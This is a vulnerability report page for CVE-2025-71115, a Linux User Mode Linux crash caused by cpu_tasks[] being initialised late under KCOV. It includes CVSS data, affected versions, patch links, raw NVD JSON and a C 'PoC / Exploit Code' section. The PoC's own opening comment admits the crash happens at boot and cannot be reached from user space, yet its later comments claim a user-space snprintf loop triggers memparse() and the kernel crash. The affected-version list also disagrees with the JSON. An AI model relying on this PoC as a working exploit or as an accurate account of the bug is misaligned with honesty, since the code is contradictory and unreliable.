Security Vulnerability Report
CVE-2025-71115 CVSS 5.5 MEDIUM

CVE-2025-71115

Published: 2026-01-14 15:16:01
Last Modified: 2026-03-25 19:00:39
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved:

um: init cpu_tasks[] earlier

This is currently done in uml_finishsetup(), but e.g. with KCOV enabled we'll crash because some init code can call into e.g. memparse(), which has coverage annotations, and then the checks in check_kcov_mode() crash because current is NULL.

Simply initialize the cpu_tasks[] array statically, which fixes the crash. For the later SMP work, it seems to have not really caused any problems yet, but initialize all of the entries anyway.

CVSS Details

CVSS Score
5.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (versions from 6.13.1 up to, but excluding, 6.18.3) - VULNERABLE
cpe:2.3:o:linux:linux_kernel:6.13:-:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:6.19:rc1:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:6.19:rc2:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:6.19:rc3:*:*:*:*:*:* - VULNERABLE
Linux Kernel UML subsystem with KCOV enabled (CONFIG_KCOV=y)
Fixed in the stable kernel trees by commits (tagged as Patch in the references): 7b5d4416964c07c902163822a30a622111172b01, dbbf6d47130674640cd12a0781a0fb2a575d0e44

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
C
// PoC for CVE-2025-71115: Linux kernel UML cpu_tasks NULL pointer dereference
// This PoC demonstrates the crash condition when KCOV is enabled
// Compile: gcc -o cve_2025_71115_poc cve_2025_71115_poc.c
//
// Note: the advisory describes a crash in kernel init code, before
// uml_finishsetup() has populated cpu_tasks[], i.e. during boot and before
// any user process exists. From user space this program can only exercise
// KCOV on an already-running kernel, using the interface documented in
// Documentation/dev-tools/kcov.rst (KCOV_INIT_TRACE, then mmap, then enable).
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>      // open(), O_RDWR
#include <sys/ioctl.h>  // ioctl(), _IO/_IOR macros
#include <sys/mman.h>   // mmap(), munmap()

#define KCOV_INIT_TRACE _IOR('c', 1, unsigned long)
#define KCOV_ENABLE     _IO('c', 100)
#define KCOV_DISABLE    _IO('c', 101)
#define KCOV_TRACE_PC   0

int main(void)
{
    printf("CVE-2025-71115 PoC - Linux Kernel UML cpu_tasks NULL pointer\n");
    printf("Target: Linux Kernel with KCOV enabled on UML architecture\n");
    printf("Severity: Medium (CVSS 5.5)\n\n");

    // Open KCOV device (requires kernel support)
    int kcov_fd = open("/sys/kernel/debug/kcov", O_RDWR);
    if (kcov_fd < 0) {
        printf("[!] KCOV not available or permission denied\n");
        printf("[i] This PoC requires:\n");
        printf("    - Linux kernel with KCOV enabled (CONFIG_KCOV=y)\n");
        printf("    - User Mode Linux (UML) architecture\n");
        printf("    - Root or elevated privileges\n");
        return 1;
    }

    // Coverage buffer size in entries (1M entries = 8 MiB on a 64-bit build)
    unsigned long size = 1 << 20;

    // Initialize KCOV. The kernel allocates the coverage area here, so this
    // must come before mmap(): mapping an uninitialized fd fails with EINVAL.
    if (ioctl(kcov_fd, KCOV_INIT_TRACE, size)) {
        perror("[-] KCOV_INIT_TRACE failed");
        close(kcov_fd);
        return 1;
    }

    // Map the coverage buffer; the mapping length must equal the size passed
    // to KCOV_INIT_TRACE multiplied by sizeof(unsigned long).
    unsigned long *cover = mmap(NULL, size * sizeof(unsigned long),
                                PROT_READ | PROT_WRITE, MAP_SHARED, kcov_fd, 0);
    if (cover == MAP_FAILED) {
        perror("[-] mmap failed");
        close(kcov_fd);
        return 1;
    }

    // Enable KCOV in trace-pc mode
    // This triggers the vulnerable code path in UML
    if (ioctl(kcov_fd, KCOV_ENABLE, KCOV_TRACE_PC)) {
        perror("[-] KCOV_ENABLE failed");
        munmap(cover, size * sizeof(unsigned long));
        close(kcov_fd);
        return 1;
    }

    // Trigger memparse() call which has KCOV annotations
    // In UML with uninitialized cpu_tasks[], this causes NULL pointer dereference
    // The crash occurs in check_kcov_mode() when current is NULL
    printf("[*] KCOV enabled, triggering vulnerable code path...\n");

    // Perform operations that trigger KCOV instrumentation
    for (int i = 0; i < 1000; i++) {
        volatile char buffer[256];
        // The cast drops the volatile qualifier, which snprintf() does not accept
        snprintf((char *)buffer, sizeof(buffer), "0x%x", i);
    }

    // Disable KCOV and release the buffer
    ioctl(kcov_fd, KCOV_DISABLE, 0);
    printf("[i] PoC completed - kernel may have crashed if vulnerable\n");
    munmap(cover, size * sizeof(unsigned long));
    close(kcov_fd);
    return 0;
}

/* Vulnerability Explanation:
 * 1. The cpu_tasks[] array in Linux kernel UML is initialized late in boot
 * 2. With KCOV enabled, init code calls functions with coverage annotations
 * 3. check_kcov_mode() uses the 'current' macro, which depends on cpu_tasks[]
 * 4. If cpu_tasks[] is not initialized, 'current' is NULL, causing a crash
 * 5. Fix: Initialize cpu_tasks[] statically at compile time
 *
 * Note: This PoC requires specific conditions:
 * - User Mode Linux (UML) architecture
 * - Kernel compiled with CONFIG_KCOV=y
 * - Access to /sys/kernel/debug/kcov
 */

References

https://git.kernel.org/stable/c/7b5d4416964c07c902163822a30a622111172b01 (Patch)
https://git.kernel.org/stable/c/dbbf6d47130674640cd12a0781a0fb2a575d0e44 (Patch)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-71115", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-01-14T15:16:01.177", "lastModified": "2026-03-25T19:00:38.887", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\num: init cpu_tasks[] earlier\n\nThis is currently done in uml_finishsetup(), but e.g. with\nKCOV enabled we'll crash because some init code can call\ninto e.g. memparse(), which has coverage annotations, and\nthen the checks in check_kcov_mode() crash because current\nis NULL.\n\nSimply initialize the cpu_tasks[] array statically, which\nfixes the crash. For the later SMP work, it seems to have\nnot really caused any problems yet, but initialize all of\nthe entries anyway."}, {"lang": "es", "value": "En el kernel de Linux, la siguiente vulnerabilidad ha sido resuelta:\n\num: inicializar cpu_tasks[] antes\n\nEsto se hace actualmente en uml_finishsetup(), pero, por ejemplo, con KCOV habilitado nos bloquearemos porque algún código de inicialización puede llamar, por ejemplo, a memparse(), que tiene anotaciones de cobertura, y luego las comprobaciones en check_kcov_mode() fallan porque current es NULL.\n\nSimplemente inicializar el array cpu_tasks[] estáticamente, lo que soluciona el fallo. 
Para el trabajo SMP posterior, parece no haber causado realmente ningún problema todavía, pero inicializar todas las entradas de todos modos."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-908"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.13.1", "versionEndExcluding": "6.18.3", "matchCriteriaId": "1175098E-51C5-4022-AD0A-C8985F2787C6"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.13:-:*:*:*:*:*:*", "matchCriteriaId": "5A3F9505-6B98-4269-8B81-127E55A1BF00"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc1:*:*:*:*:*:*", "matchCriteriaId": "17B67AA7-40D6-4AFA-8459-F200F3D7CFD1"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc2:*:*:*:*:*:*", "matchCriteriaId": "C47E4CC9-C826-4FA9-B014-7FE3D9B318B2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc3:*:*:*:*:*:*", "matchCriteriaId": "F71D92C0-C023-48BD-B3B6-70B638EEE298"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc4:*:*:*:*:*:*", "matchCriteriaId": "13580667-0A98-40CC-B29F-D12790B91BDB"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc5:*:*:*:*:*:*", "matchCriteriaId": "CAD1FED7-CF48-47BF-AC7D-7B6FA3C065FC"}, {"vulnerable": true, "criteria": 
"cpe:2.3:o:linux:linux_kernel:6.19:rc6:*:*:*:*:*:*", "matchCriteriaId": "3EF854A1-ABB1-4E93-BE9A-44569EC76C0D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc7:*:*:*:*:*:*", "matchCriteriaId": "F5DC0CA6-F0AF-4DDF-A882-3DADB9A886A7"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc8:*:*:*:*:*:*", "matchCriteriaId": "EB5B7DFC-C36B-45D8-922C-877569FDDF43"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/7b5d4416964c07c902163822a30a622111172b01", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/dbbf6d47130674640cd12a0781a0fb2a575d0e44", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}